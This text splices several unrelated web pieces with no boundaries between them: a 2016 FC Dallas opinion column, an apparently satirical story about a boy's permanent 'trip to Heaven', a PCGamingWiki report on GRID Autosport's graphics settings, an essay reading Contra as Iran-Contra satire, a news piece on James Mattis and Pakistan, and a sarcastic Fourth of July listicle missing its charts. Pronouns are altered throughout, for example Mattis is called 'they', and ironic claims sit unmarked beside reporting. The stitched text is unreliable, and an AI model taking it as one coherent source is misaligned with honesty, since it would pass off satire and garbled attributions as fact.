FC Dallas midfielder Michael Barrios ( 21 ) celebrates with the team after scoring a goal against Seattle Sounders FC during the second half of their game at Toyota Stadium in Frisco , Texas May 14 , 2016 . FC Dallas won the game 2-0 . ( Nathan Hunsinger/The Dallas Morning News )
FC Dallas midfielder Mauro Diaz ( 10 ) is congratulated after a goal against Seattle Sounders FC during their game at Toyota Stadium in Frisco , Texas May 14 , 2016 . ( Nathan Hunsinger/The Dallas Morning News ) -- MANDATORY CREDIT , NO SALES , MAGS OUT , TV OUT , INTERNET USE BY AP MEMBERS ONLY
FC Dallas forward Fabian Castillo ( 11 ) and midfielder Kellyn Acosta ( 23 ) try to steal the ball from Seattle Sounders forward Jordan Morris ( 13 ) during the second half of their game at Toyota Stadium in Frisco , Texas May 14 , 2016 . FC Dallas won the game 2-0 . ( Nathan Hunsinger/The Dallas Morning News )
FC Dallas is the stealthiest club in MLS . Combining results from 2014 , 2015 and over half of the current season , it has earned the most points in MLS . North Texas soccer fans have had a very good team to enjoy for the better part of three consecutive seasons . Sure , there have been occasional dips and losing streaks as there are for any team , but cumulatively , FC Dallas is the winningest team in the league since 2014 . This team has been so consistently good under Oscar Pareja that by now fans may have been lulled into taking the team for granted . More on that later .
FC Dallas is also `` stealthy '' in its player acquisition . Despite eschewing any recognizable , established stars , the team continues to turn up gems that have jelled into arguably the league 's most cohesive , reliable lineup . This is why for example , FCD 's latest signing , a Brazilian forward we 've never heard of named Getterson , elicits smirks and shrugs from fans , yet I 'm willing to give this coaching/technical staff the benefit of the doubt because of their recent track record . Getterson could very well end up being a genius find . Of course , it typically takes a new-to-MLS FC Dallas signing at least six weeks to even make the bench , but I digress .
In an article for 3rd Degree last season , I made the comparison between FC Dallas ' academy system prowess and that of the EPL 's Southampton . FC Dallas continues to distinguish itself in this facet , winning the U-16 and U-18 national championships last week . FCD 's academy work is indeed admirable , but like Southampton , FCD may not be able to reap the long-term benefits of the program because it may not be able to afford to keep its best prospects . Just this week we learned U-18 forward Weston McKennie has been approached by Schalke . There 's still a chance FCD may be able to work out a way to keep him , but ultimately -- and this is the club 's problem with all its best talent -- - it wo n't always be able to keep the cream of the crop , because of the economics of MLS vs. the wider soccer world . Reality is , virtually all MLS clubs have to be selling clubs , particularly if one of the top three leagues in Europe comes calling .
FC Dallas is a very good team , it 's fun to watch at home and it has several terrifically talented players . If the club is ever going to win MLS Cup , this must be the year because if it 's not , I fear this squad will be cherry-picked by richer teams sooner than later . In this regard , FC Dallas could soon be more akin to Ligue 1 's Lyon , famous over the last decade for discovering under-the-radar talent and eventually selling players for big profits .
Sooner than later , Diaz , Castillo , Barrios , Hedges , Acosta , or Ulloa will surely depart for richer clubs in Europe or elsewhere . If Brek Shea can go to Stoke City from FCD , any of the previously mentioned would certainly have a shot . Their health issues aside , I 'm surprised Mauro Diaz has n't been scooped up by another club yet ; they are surely on borrowed time in an FCD jersey by this point . Eventually , Jesse Gonzalez and Walker Zimmerman could garner outside interest as well . Hate to say it , but even Pareja could be recruited . Pareja has done an amazing job developing these players and shaping this team , but the top talent will inevitably leave the nest .
I hope I 'm wrong . I hope none of these players , or Pareja , leave FC Dallas anytime soon . But if I were a European scout looking for an edge , I 'd keep an eye on FCD .
Back to my original concern that this terrific current FC Dallas team is perhaps being taken for granted by fans , and certainly by the wider North Texas soccer market . Despite its on-field success , FCD continues to register a tiny footprint in DFW with scarce local media coverage and little branding visibility . Despite lopping off the south bleacher end of the stadium this year due to National Soccer Hall of Fame construction ( which still has n't really begun , by the way ) , Toyota Stadium attendance remains stagnant and far from sold out . It 's a head-scratcher because this team has rarely been so watchable .
So , if you appreciate fine soccer but do n't typically make it out to Toyota Stadium , now is the time to buy a ticket . Get out there and enjoy this team while you still can -- before it becomes a victim of its own success .
Nathan Nipper is the author of the award-winning book Dallas 'Til I Cry : Learning to Love Major League Soccer .
If you 're looking for proof that there is life after death , look no further than the incredible story of Jonathan Stowell .
In the middle of an emergency surgery the 10-year-old 's heart stopped beating , and it looked like they had lost him . What happened to Jonathan in those critical minutes when doctors struggled to bring them back to life will amaze you : Jonathan visited Heaven . And guess what ? They stayed there . Forever .
Advertisement
That 's right . As their doctors tried everything they could to save their lives , Jonathan left their body and the entire Earth behind , floating up into Heaven . And he 's still there . Gone from this world forever after their doctors were unable to revive him . Incredible , right ?
It 's no surprise , then , that the story of Jonathan 's permanent trip to Heaven is renewing people 's faith all around the world . We would n't be surprised if it has even got some atheists second-guessing themselves !
Thanks , Jonathan ! And may you rest in peace .
System Requirements
Minimum
CPU : Intel Core 2 Duo @ 2.4Ghz or AMD Athlon X2 5400+
Intel Core 2 Duo @ 2.4Ghz or AMD Athlon X2 5400+ RAM : 2 GB
2 GB HDD : 15 GB
15 GB GPU : Intel HD3000 or AMD HD2000 Series or NVIDIA Geforce 8000 Series Series
Intel HD3000 or AMD HD2000 Series or NVIDIA Geforce 8000 Series Series OS : Vista , 7 , 8
Recommended
CPU : Intel Core i7 or AMD FX Series
Intel Core i7 or AMD FX Series RAM : 4 GB
4 GB HDD : 20 GB
20 GB GPU : Intel HD5200 or AMD HD7000 Series or NVIDIA GTX600 Series minimum 1 GB RAM
Although the system requirements might look rather concerning for some , GRID Autosport is n't exactly a very demanding game by itself , and it does manage to have it 's moments where it looks very nice , but otherwise the art style on some of the tracks slightly ruins this impression which is a shame seeing as some tracks are downright beautiful while others do look rather bland in comparison .
Testing was performed on a system with an Intel Core 2 Quad Q9400 CPU with 4 GBs of RAM and an Nvidia Geforce GTX 650 Ti running at a resolution of 2048x1152 .
Video settings
GRID Autosport features a surprisingly vast array of video options , the choice being rather staggering . The most notable option being the native multi-monitor support , otherwise nothing else really stands out , other than the local split screen mode which is something very rarely found in a PC game but that 's unrelated to the video options .
Having to deal with such a vast amount of options can get slightly confusing and tedious , meaning that some tooltips explaining very briefly what each setting changes could 've been pretty useful , seeing as some of the options did not clearly display any obvious new changes when turned on .
The differences between Ultra Low and Ultra are pretty extreme and instantly noticeable .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1045114.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1740638.jpg|800|450|Ultra Low|Ultra [ /compimg ]
However Ultra and High do not appear to differ as much , the differences between each preset being rather more subtle at the maximum settings .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1896722.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1740638.jpg|800|450|High|Ultra [ /compimg ]
Setting everything to the max might seem pointless , seeing as some options behave rather inconsistently , only affecting a few select entities instead of the game as a whole , which the player might not usually pay attention to . The Ultra settings are far more useful for players who love to take high resolution pictures in order to get the most out of their picture quality , but from a gameplay standpoint most values can easily be set to High without any huge loss of details .
Night lighting
A pretty cool effect , although it is only applied to the car 's headlights during night tracks instead of actually affecting the ambient lighting of the level itself .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_179335.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_471857.jpg|800|450|Low|Ultra [ /compimg ]
Ground cover
This setting mainly affects the outer parts of the racing track , where dirt and such may be found which adds some extra details such as foliage , the main difference between Ultra and High is the quantity of grass being rendered at the same time . The grass also appears to dynamically move .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_686984.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1859573.jpg|800|450|Low|Ultra [ /compimg ]
Vehicle details
The most obvious change at lower settings is the fact that the game will stop rendering the player models for other drivers which are located in the cockpit .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_551103.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1408609.jpg|800|450|Ultra Low|Ultra [ /compimg ]
This setting also mainly affects how other cars will look on the track , the player model itself only suffering from a very slight lighting change at higher values , although the player 's own model is still going to be rendered at a value beyond Ultra Low but again the differences are very subtle and on higher end systems what this value is set at does n't exactly matter .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1473053.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1917594.jpg|800|450|Medium|Ultra [ /compimg ]
Reflections
The difference between reflections is far more noticeable while actually driving , Ultra reflections being slightly less exaggerated than reflections on High although they are slightly more demanding framerate wise , some surfaces or objects may also cast reflections in a slightly differently way , Low and Medium still look pretty similar to High otherwise .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_469718.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_985166.jpg|800|450|High|Ultra [ /compimg ]
Shadows
The differences between Ultra Low and Ultra are clearly pretty large , on the other hand Ultra and High are much more similar . On Ultra the shadows are slightly blurred out looking more realistic while on High shadows have a slightly fuzzier and simpler look which is not the case at the maximum setting .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1571792.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1562877.jpg|800|450|Ultra Low|Ultra [ /compimg ]
Advanced fog
The fog helps the skybox blend in better with the rest of the ambient which may also be used in order to mask some of the less detailed areas .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_228768.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_91335.jpg|800|450|Off|On [ /compimg ]
Particles
The differences might be harder to spot during usual gameplay , High and Ultra look pretty similar while Low and Medium particles will appear as being slightly less well-defined , the particles themselves having a cheaper look .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_159488.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1555.jpg|800|450|Low|Ultra [ /compimg ]
Crowd
At lower settings members of the crowd in the distance will appear to be rendered as 2D figures while on Ultra the LOD is n't really used anymore , the crowd being fully rendered at all times using the highest quality settings and details . The difference from High to Ultra however is pretty minor , the only obvious change being the improved lighting while the LODs will start loading a whole lot more aggresively at lower settings .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_170378.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_344878.jpg|800|450|Ultra Low|Ultra [ /compimg ]
The crowd can also be turned off completely , it is curious however how the crowd itself is randomized each time a new race is started .
Cloth
Nothing exactly special here other than some extra eye candy . Some shadows are still somehow being cast although this is a very minor issue anyway .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_107202.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_192861.jpg|800|450|Off|High [ /compimg ]
Ambient occlusion
The HBAO in GRID Autosport is rather more subtle than most games but it still manages to add some extra depth to the overall scene .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_610799.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_632071.jpg|800|450|Ultra Low|Ultra [ /compimg ]
The soft HBAO setting also goes along to add even more depth to the shadows which does not affect the framerate too much .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_523161.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_632071.jpg|800|450|Soft HBAO Off|Soft HBAO On [ /compimg ]
Trees
Trees follow the same logic as the crowd , being always perfectly rendered on Ultra , the LODs progressively starting to load far more aggressively on lower values , on Ultra Low however trees always use the lowest possible LOD available . Maps featuring large amounts of trees in the skybox are not affected by this setting .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_280725.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_105247.jpg|800|450|Ultra Low|Ultra [ /compimg ]
Objects
Most smaller or less important entities appear to be affected by this setting which mainly changes which LODs are being loaded , some buildings may even appear as taller .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_205132.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1629950.jpg|800|450|Low|Ultra [ /compimg ]
Advanced lighting
Again , this only appears to be applied for very few specific light spots or entities along with some very minor lighting changes affecting cars . The performance difference is certainly not worth the very small benefits it does showcase .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_953827.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_574123.jpg|800|450|Off|On [ /compimg ]
Texture quality
The new vehicle textures from the HD texture pack appear to have modified how the Low , Medium and High values function , meaning that the same textures are always being loaded at all times somehow . Without the texture pack itself there were still no clear differences between the three quality settings , other than the vehicles looking slightly different .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_968891.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_897492.jpg|800|450|Low ( HD ) |High ( HD ) [ /compimg ]
Shader quality
There 's a very large difference between Ultra Low and Ultra , most decals not being rendered at all . On Medium and High the shader appears to apply a Depth of Field effect around most objects which looks fairly nice in motion . Setting the shader to Ultra Low will also stop it from rendering any cosmetic related damage or even some very specific decals located on the player 's car .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_851096.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_664192.jpg|800|450|Ultra Low|Ultra [ /compimg ]
Oddly enough the changes between Low and Ultra are n't as large , setting the Shader to Low will also allow players to disable the rather odd DoF effect in the cockpit view , some effects such as the lens flares and such will otherwise be missing .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1709599.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_664192.jpg|800|450|Low|Ultra [ /compimg ]
Anisotropic filtering
This can easily be set to Ultra or High seeing as there is pretty much no performance loss , what 's interesting is the fact that this setting also appears to affect the crowd .
[ compimg ] http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1221555.jpg|http : //community.pcgamingwiki.com/uploads/gallery/album_40/gallery_371_40_1679583.jpg|800|450|Low|Ultra [ /compimg ]
Performance analysis
GRID Autosport comes bundled with an already included benchmark test which can be very handy , the automatic settings have been pretty much spot on and overall the performance has been pretty great .
Controls
The game features full controller support along with fully customizable keybinds . By default the game also has a preset for left handed people , allowing one player to play with a controller while the second player uses a keyboard . It is disappointing however that the game features no mouse controlled menus whatsoever , and using the mouse in-game is not possible either .
Audio
There 's a wide array of audio options too although it is rather odd how some settings can not be completely muted and the lack of a master volume setting is a minor issue but otherwise it is still very complete .
Conclusion
GRID Autosport is a very nice PC game which comes bundled with pretty much anything one might imagine being available by default , although it still does miss some features which would truly make it complete , the video settings menus feel a bit too spread out seeing as some sort of categorization would greatly help . It is surprising however how nicely the game was handled showing that indeed nice PC ports are clearly a possible feat , the only downside being that they do require a whole lot more effort than most normal games , which might in the end be slightly detrimental towards other aspects .
PC Reports are a series of quick first impressions regarding the technical aspects of a PC game . This report was written by PCGamingWiki contributor RaTcHeT302 . For an up to date account of GRID Autosport fixes and improvements , please visit its respective PCGamingWiki article .
Do a quick Google search of “ contra. ” Browsing the first few pages , you should see a saturation of links about the videogame—the now-primary version of the word—sprinkled with other definitions . Next in the deck is contra as preposition : “ against , contrary , or opposed to , ” suitingly enough . Then , a “ contemporary New York cuisine ” restaurant ; contra-dancing , a folksy flirty form adaptable to many musical styles ; the second album by Vampire Weekend ; and eventually , peeking through before being closed out again , you 'll stumble upon the elephant in the room .
Contras are the name of the group of soldiers from Nicaragua that Ronald Reagan cultivated in the 1980s , during the Cold War . They were created specifically to fight the Sandinistas , a socialist political party , who had recently overthrown the right-wing and American puppet dictator , Somoza .
Contra commandas 1987 via Tiomono
Because the American taxpayers were n't all that jazzed about their money going to foreign soldiers with dubious causes , fighting with doubtlessly corrupt methods—raping , torturing , and kidnapping civilians just a smidgen—the Boland Amendment was legislated between 1982 and 1984 in order to prevent Reagan from overreaching . Except , it did n't work . The Iran-Contra affair , revealed by Lebanese newspapers , eventually proved that via loopholes in the amendment , a couple soldiers , under Reagan , were still sending funds , albeit “ privately , ” to the contras , paid for by selling illegal weapons to Iran .
The Iran-Contra affair put an even deeper black mark on Reagan 's record . The public knowledge of it and disapproval of them culminated in late 1986 , which raises some questions about the videogame titled Contra , first released for the arcade a few months later in February 1987 . Some serious questions .
It should be noted that Konami 's original Japanese title “ kontora ” was chosen solely to sound like the Western word “ contra , ” and not because of any particular meaning in its individual syllables , so we know that American translators did n't take any creative liberties on the title . Europe , however , either used the names Gryzor for various computer ports , or Probotector for the NES one .
everything about the American Contra is more spicy
It was easy to avoid the nasty political implications of Contra . Actually , Probotector is a portmanteau of “ robot ” and “ protector ” changed to match the new eponymous sprites , now less violent and more robotic than humans . Under Germany 's restrictions for the Federal Department for Media Harmful to Young People ( BPjM ) , certain media could n't be sold on the basis of being potentially , well , harmful to young people . Also , Gryzor is what Ocean Software ( now Atari , inc. ) named the first arcade version in PAL regions , likely because it thought Kontora 's literal translation did n't make any sense ; though dodging the awkwardness of witlessly commenting on political controversies at the time should n't be ruled out .
On the surface , the contras in the game only share superficial commonalities with the ones in real life ( i.e , they 're both soldiers ) . In Japan , the game takes place in New Zealand , the year 2633—a relatively innocuous time and location . In the American translation of Contra , however , where the political realities and controversy surely would n't tackle the subject head-on , the opposite is true . It is set somewhere in the Amazon , in the present day , 1987 . Those jungle trees and mountains in the background are just as much the geography of Nicaragua as New Zealand . Usually , localization and translation are meant to make a game more palatable , but everything about the American Contra is more spicy .
Extract from the American NES manual
Contra , in all its variations of story and aesthetic , tossed from creative hands in different regions and consoles , overwriting story and even art , is something of a homunculus . It 's difficult to talk about because it barely exists in any real pure form . That being said , the American translation , particularly the plot in the instruction booklet appears to interpret the content of the game into something new and subversive : a subtle satire of Reagan fooling around in Nicaragua , and American military expeditions in general .
The game 's plot , described in the American NES manual , as in the excerpt below , reads like a transparent send-up of America 's view of the events in Nicaragua , and more specifically , its black-and-white take on fighting communism in the Cold War .
“ In 1957 , a large object from outer space crashed into Earth 's Amazon basin , near the ruins of a lost Mayan civilization . Scientists worldwide heralded the incident as a trivial cosmic occurrence , and thus the collision was soon forgotten . ”
The Mayan civilization , not located in South America as the manual indicates , existed in rough proximity to modern Nicaragua . The “ large object from outer space , ” the enemy in the videogame , can be seen as the enemy to the contras in real life , the Sandinistan government . Sandinistas ( in Spanish , Frente Sandinista de Liberación Nacional , shortened FSLN ) naturally opposed to the US , trumpeting anti-imperialism and Marxism . They formed in 1961 , which was relatively trivial , until later when the ambitious goals of “ seizure of political power ” were met .
“ Now thirty years later , rumors of an evil force have swept into the Pentagon 's front office and tales from frightened villagers of a hideous being with an army of alien henchman are sending chills down the spines of top military brass . ”
Even the aesthetics of Contra represent America , borrowing from macho action films
The FSLN finally did carve a victory in 1979 over the US surrogate , Somoza ; a revolution now known as one of the most significant events in Nicaraguan history . “ Rumors of an evil force ” also swept into the Pentagon 's office : once the Reagan administration got wind of the Nicaraguan leader supporting Cuban Socialism and leftist El Salvador , they were spurred to fund the opposition and to even directly send CIA soldiers to Nicaragua .
“ Unwilling to upset current political stability , an all-out assault on the region has been overruled and instead , two of America 's most cunning , courageous and ruthless soldiers from the Special Forces elite commando squad have been selected to seek out and destroy these alien intruders . ”
Ignoring the absurdity of “ upsetting political stability ” by waging war on an alien literally sent solely to kill humanity , this is almost exactly what Reagan did to contain the spread of socialism in Nicaragua , sending the CIA over to do the dirty work . Except they also hired the contras , the citizens of Nicaragua who did n't particularly care for their new Sandinista government , due to a variety of reasons , whether that be displaced anti-Sandinistans , or peasants who did n't get what they were promised . Even , curiously enough , the first two bridges that get destroyed in Contra , iconic to players of the game , have a striking real life parallel . In their book , Veil : The Secret Wars of the CIA , 1981-1987 , Bob Woodward found that the CIA destroyed two bridges in 1982 , near the beginning of the expedition .
The next paragraph of the Contra booklet describes the goals of the antagonist alien , Red Falcon , not at all removed in either semantics ( “ red , ” anyone ? ) , chronology , or rhetoric , of the Cold War .
“ You 're about to come face to face against Red Falcon , the cruelest life-form in the galaxy . They arrived on Earth thirty years ago ( that is six months time in an alien 's life ) to establish a foothold from which they will attempt to conquer our world and then use it as a stepping stone toward their ultimate fiendish goal : domination of the universe . ”
The anti-communist scare and Cold War started roughly around 1950 , around the same time Red Falcon arrived . Lots of the rhetoric used to describe communists in order to motivate America against the communists were based on unwarranted fears that they would take over the world , stepping on one little third-world country at a time . Just like Red Falcon , the fear was equal parts goofy and apocalyptic .
I do n't even know what to say about the last part :
“ If you succeed . well…it does n't matter , because I doubt you will . ”
Contra as a game raises a clear opinion about the real contra scandal
Even the aesthetics of Contra represent America , borrowing entirely from macho action films . Look at the original Japanese models for the characters Bill Rizer and Lance Bean . Do you see Nicaraguan soldiers ? I see two grizzled , white Hollywood archetypes . In fact , Lance is Sylvester Stallone , drawn at times with quintessential sweatband as Rambo ( First Blood , 1982 ) , and Bill is Arnold Schwarzenegger , chewing a cigar , just like in the movie Commando ( 1985 ) . Even Bob Wakelin , the artist for the NES box art in Europe , brutally observed that this game is a “ rip-off ” of an American action movie , namely “ Alien/Predator. ” Even the enemies in Contra are inseparable from Hollywood , inspired by H.R . Giger 's monsters , through Alien ( 1979 ) .
The dissonance between the title and overtly American content of the game delivers the sharpest criticism : the contras fighting the war are proxies for gung-ho Americans fighting a different one . It lampoons Ronald Reagan 's self-image in the fight against communism during the Cold War . Or , it lampoons the lack of self-awareness one needs to fight an unjust war . Contra raises a clear opinion about the real contra scandal , more precisely on the irresponsibility of Cold War rhetoric in making serious decisions . Made more appropriate given Reagan 's background as an actor , extending the Reagan Doctrine to its logical extreme as an appropriately dumb fantasy movie is an artful way of skewering it .
The American manual could have been orchestrated by a clever translator who re-interpreted an innocent game , inspired by American popular cinema , into a personal joke about the sinful nature of said movies—perhaps cathartically releasing their frustration through an unpopular medium where nobody would raise an eyebrow . Or it could have been the product of the opposite : absolutely no self-awareness about how current events can be sneakily channeled or commented on through seemingly brainless media .
After the game is beaten , the credits roll with the ending theme , composed by Kazuki Muraoka . It sounds about how the ending to a war movie should sound . A little bit triumphant , but a lot stoic , like a toast to victory over one particularly hard mission in the line of millions . It is an epilogue in itself . It is also called Sandinista .
Do a quick Google search of the word “ contra ” again . Maybe it 's poetic that most people in America today signify the word with the game , rather than reality .
New Delhi : The next US secretary of defence was the Obama administration 's main man to keep a line open and bring ties with the top Pakistani military leadership back on an even keel in the dark days following the arrest of a CIA contractor and the killing of Osama bin Laden .
General James Mattis , whose appointment was announced by president-elect Donald Trump 's transition team on Thursday , was the US Central Command ( CENTCOM ) head from 2010 to 2013 .
In January 2011 , CIA contractor Raymond Davis shot dead two men in Lahore , which triggered a major diplomatic stand-off between Washington and Islamabad . Seven weeks after the incident , Davis was let off after $ 2 mn was paid as blood money to the next of kin .
Even as bilateral tensions were high , Mattis , who had described partnering with Pakistan as one of the key tasks for CENTCOM , commended the Pakistan military for making “ very significant moves ” against terrorists at a Senate Armed Service House hearing in March 2011 on the “ Posture of US Central Command ” .
While New Delhi was not part of their area of reach , Mattis recognised that “ India 's influence impacts the strategic calculations of Pakistan and , to some extent , virtually every other country in the CENTCOM AOR [ Area of Responsibility ] ” .
“ We recognize that Pakistan 's long-standing tensions with India are an important part of Pakistan 's strategic decision-making calculus and military force posture . However , the presence of extremist sanctuaries in Pakistan significantly impacts our progress in Afghanistan , and with the Pakistan military 's help we are taking important steps to improve cross-border operations , ” they said .
Mattis had said at the hearing that the Pakistani tribal regions were the “ principal sanctuary for Al-Qaeda and a safe haven for other extremist groups , enabling them to threaten the population and coalition forces in Afghanistan , the people and government in Pakistan , and US and Western interests globally ” .
Praising Rawalpindi for making “ impressive strides ” in combating terrorists in FATA , they had also highlighted that Pakistan had deployed “ upwards of 140,000 troops along Pakistan 's western border with Afghanistan , a significant portion of which were drawn from Pakistan 's border with India ” .
“ While Pakistan 's operations are acting as the ― “ hammer ' on their side of the border , combined Afghan and ISAF forces are poised to defeat displaced insurgents , acting as the ―anvil . Afghan Border Police and other combined security forces are manning outposts along the border and armed drones and close combat aviation are monitoring previously-identified mountain passes that insurgents will likely use as they seek sanctuary in Afghanistan ” .
Mattis also lobbied for a consistent flow of US security assistance , which they termed as “ critical ” for the Pakistan partnership .
The month after the Senate hearing , Mattis travelled to Pakistan – breaking the ice as the highest-ranking US official to travel to Islamabad after the Davis affair .
Of course , within a month of the visit , Washington faced another crisis of faith regarding Islamabad after a Navy Seal team killed Al-Qaeda leader bin Laden in their multi-storied house , just a crow 's flight from the top Pakistani military school . It left a legacy of deep mistrust between the two governments , which continues to linger even today .
If that was not enough , Mattis had to confront the fallout from US forces in Afghanistan mistakenly targeting two Pakistani military border checkpoints , which left over a dozen soldiers dead . Even as Washington refused to apologise , Pakistan closed NATO supply lines and the Shamsi airfield base , while anti-American protests erupted all over the country .
In March 2012 , Mattis was once again trying to calm down Congressmen baying for Pakistan 's blood over bin Laden , as attitudes against Islamabad hardened across Capitol Hill and intelligence circles . Mattis told the House Armed Services that they “ did not believe that anyone in Pakistan was aware that the Al-Qaeda chief was in Abbottabad ” , The News reported . The article also quoted them as saying that “ he was well aware that nobody was in the knowledge of Osama 's presence in Abbottabad ” .
On relations with Pakistan , they gave a more mixed picture than a year before . “ There are disagreements on some aspects of who 's the enemy and who is not , and over years some of this has shifted below both of our feet but the threat that the enemy presents is a threat to Pakistan as much as it is to Afghanistan , ” they said .
But , they went onto to say that despite differences , Islamabad was a key ally . “ We do n't have 100 percent common ground about it , but it is not a showstopper , ” they said .
In the 2012 hearing , Mattis expressed a sense of gratitude towards Pakistan for their help after 9/11 . “ Gen Mattis said they could not have gone to Southern Afghanistan without Pakistani support in 2001 , ” The News reported .
During the Afghan invasion , Mattis , a brigadier general at that time , was in charge of Task Force-58 , whose troops were the first to land near Kandahar to operate a forward operating base .
In January 2013 , President Barack Obama announced in their State of the Union address that there US troops in Afghanistan would be halved by February 2014 . In the month of their retirement in March 2013 , Mattis said at another Senate hearing that they had recommended that 13,600 American soldiers should remain in Afghanistan after the draw down began in 2014 . The final figure at that time was 9800 American soldiers .
In a February 2015 article published by the Hoover Institution , Mattis talked of the need for a “ refreshed national strategy ” . On Afghanistan , they specifically pointed out that that the debacle in Iraq after the US troops left the country had to be avoided .
“ In Afghanistan we need to consider if we 're asking for the same outcome there as we saw last summer in Iraq if we pull out all our troops on the Administration 's proposed timeline . Echoing the military advice given on the same issue in Iraq , gains achieved at great cost against our enemy in Afghanistan are reversible . We should recognize that we may not want this fight but the barbarity of an enemy that kills women and children and has refused to break with Al Qaeda needs to be fought . ”
By that time , the US administration had begun to slow down and eventually postpone the return of US troops as planned by 2016 . From the initial plan to have only 5500 troops , the US will now have 8400 soldiers after the end of this year .
Indian officials will find some solace in Mattis 's view on the continued US military presence in Afghanistan , but their tempered view on the usefulness of the Pakistan military in combating terrorism may not find many takers .
Cabinet conflict ?
It remains to be seen if Trump 's defence secretary and national security advisor , Lieutenant General Michael T. Flynn , will play a tug-of-war on giving some leeway to Islamabad .
Flynn , who had worked under Mattis , has been rather clear that it can not be business as usual in ties with Pakistan .
In their 2016 book The Field of Fight , Flynn said that “ countries who pretend to be our friends ” will have to “ choose ” in the fight against Islamic radicalism or “ we are going to treat them harshly ” ,
“ As we do that , we need to have some tough love conversations with the leaders of countries who pretend to be our friends , but who also collaborate with our enemies . Countries like Pakistan need to be told that we will not tolerate the existence of training camps and safe havens for Taliban , Haqqani , and al Qaeda forces on their territory , nor will we permit their banks and other financial institutions to move illicit funds for the terror network . They are going to have to choose , and if they continue to help the jihadis , we are going to treat them harshly , cutting them off from American assistance , and operating against enemy safe havens . ”
The Iran factor
While there might be a bit of gap between Flynn and Mattis on how to handle Af-Pak , they seemingly have the same view on Iran – the dominant threat to the US .
“ It was a huge strategic mistake for the United States to invade Iraq militarily . If , as we claimed , our basic mission after 9/11 was the defeat of the terrorists and their state supporters , then our primary target should have been Tehran , not Baghdad , and the method should have been political—support of the internal Iranian opposition ” .
Flynn , formerly chief of the Defense Intelligence Agency , expounded that Iran was giving shelter to the al-Qaeda after they left Afghanistan . “ This meant that the world 's preeminent Sunni terrorist organization had an operational base within the world 's preeminent Shi'ite country , ” claims Flynn .
They wrote that the Iran-al-Qaeda link would come to the front if Obama administration permitted the publication of documents seized from bin Laden 's Abbottabad compound . It will be interesting to check if the incoming Trump administration will accelerate the release of the bin Laden documents , which are being released in tranches by the office of director of national intelligence .
Flynn 's cabinet colleague also considers Tehran as the primary enemy . In February 2013 , Mattis gave the keynote address at Foreign Policy Research Institute 's annual dinner , where they lobbied the high-powered audience to remain engaged in middle-east despite lowering of US dependence on Saudi oil .
While talking of the importance of standing beside steadfast Arab allies like Jordan and the UAE , they said “ We support our friends and allies in the region against violence extremism and any bellicose nation . And there is one with external design and you know who that is Iran . Every morning I woke up , I had three primary concerns , that was Iran , Iran and Iran . That was what I woke up to each day as commander of Central Command ” .
It 's the Fourth of July , and in addition to commemorating the nation 's independence , patriotic citizens everywhere will be celebrating American exceptionalism and how many other countries have to learn from us .
Here are seven charts from the 2015 Social Progress Index proving no one has it better than Americans , no country has fewer problems than the United States and certainly no people could be more free than the citizens of the greatest country in the history of the world .
1 . Americans treat their tired , their poor , their huddled masses better than anyone else !
When it comes to basic life and health amenities , the U.S. is killing it .
2 . We have the best educational system in the world !
Whoo culd posiblee no mor ?
3 . Americans are safer than any other people in the world .
And if anyone is safer , it 's obviously thanks to America .
4 . No country is less racist than the United States !
Since when has `` all men are created equal '' not been completely true ?
5 . Americans live longer , happier lives than anyone else .
Just living la vida loca .
6 . No one is more free to challenge tyranny than Americans .
You can say whatever you want here !
